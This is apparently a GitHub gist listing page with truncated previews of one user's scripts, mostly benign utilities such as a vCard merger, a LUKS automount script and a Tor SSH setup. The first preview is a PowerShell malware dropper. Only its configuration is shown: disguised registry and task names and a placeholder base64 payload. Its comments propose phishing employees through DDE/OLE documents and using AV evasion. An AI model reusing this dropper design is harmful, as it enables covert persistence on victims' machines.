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loadenmb / dropper_scheduler_registry_persistence.ps1
Created October 7, 2019 08:03
powershell payload dropper written in powershell with persistence in registry and startup as scheduled task at logon for user
# powershell payload dropper written in powershell with persistence in registry and startup as scheduled task at logon for user.
# sample usage: inside Microsoft DDE, OLE dropper to send persistence invites for IT security courses for employee whose know your course already.
# use with av evasion always to be sure your courses has enough participants (I will link good power point tutorial later)
$regp = "securesoft"; # registry path / task name
$regn = "guard"; # registry key name / task name
# base64 encoded powershell payload or URL which output base64 encoded powershell
$payloadBase64 = "QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uV2luZG93cy5Gb3JtczsKJEZvcm0gPSBOZXctT2JqZWN0IHN5c3RlbS5XaW5kb3dzLkZvcm1zLkZvcm07CiRGb3JtLlRleHQgPSAiU2FtcGxlIEZvcm0iOwokTGFiZWwgPSBOZXctT2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsOwokTGFiZWwuVGV4dCA9ICJUaGlzIGZvcm0gaXMgdmVyeSBzaW1wbGUuIjsKJExhYmVsLkF1dG9TaXplID0gJFRydWU7CiRGb3JtLkNvbnRyb2xzLkFkZCgkTGFiZWwpOwokRm9ybS5TaG93RGlhbG9nKCk7Cg==";
loadenmb /
Created October 10, 2019 08:10
Bulk download random images with predefined keywords and size from to current directory
# bulk download random images with predefined keywords and size from to current directory
# config
KEYWORDS="beach,girl" # search keywords comma separated
WIDTH=800 # image width
HEIGHT=600 # image high
COUNT=2 # image count
MAXTRIALS=3 # max errors until stop
loadenmb / snippet-pwsh_xorhexbyte.ps1
Created October 19, 2019 18:41
powershell XOR encoder / decoder and hex / byte - byte / hex conversions
# powershell XOR encoder / decoder and hex / byte - byte / hex conversions
# usage: execute & see output
# xor encoder / decoder
function xor($bytes, $string) {
$newBytes = @();
for ($i = 0; $i -lt $bytes.Count; $i++) {
$newBytes += $bytes[$i] -bxor $string[$i % $string.Length];
return $newBytes;
loadenmb /
Created September 10, 2019 17:52
sshd tor authenticated hidden service setup script
#! /bin/sh
# sshd tor authenticated hidden service setup script
# <configuration>
SSH_PORT="" # new SSH port, leave empty for no change
# </configuration>
# workflow:
# - change SSH port if not empty
# - setup SSH brute force protection: fail2ban
# - setup tor: basic authenticated sshd hidden service
loadenmb /
Created October 7, 2019 15:37
multiple vcards (*.vcf) to single vcard converter (all.vcf)
#! /bin/sh
# multiple vcards (*.vcf) to single vcard converter (all.vcf)
# usage: place in vcard directory and execute to convert multiple .vcf from current directory to single one named all.vcf
# do for all .vcf files from directory
for file in *.vcf; do
# add file content do single vcard
cat "$file" >> ../all.vcf
loadenmb /
Created October 7, 2019 15:36
Play sound of random file from directory in background without video output
#! /bin/sh
# play sound of random file from directory in background without video output
# usage: play random audio or video file at special time with cron :)
# setup on debian: apt-get install -y vlc alsa-utils
# directory to choose random videos from
# get random file from dir
loadenmb /
Created May 20, 2019 12:36
Create auto mount of luks encrypted volume on system start
#! /bin/sh
# create auto mount of luks encrypted volume on system start
# scripts requirements: cryptsetup (luks), awk, grep, dd
# files changed by script: /etc/crypttab, /etc/fstab
# files created by script: DRIVE_PATH (mount path)
# tested on: debian stretch
# set configuration & chmod +x this script ;) & run this script
# see: |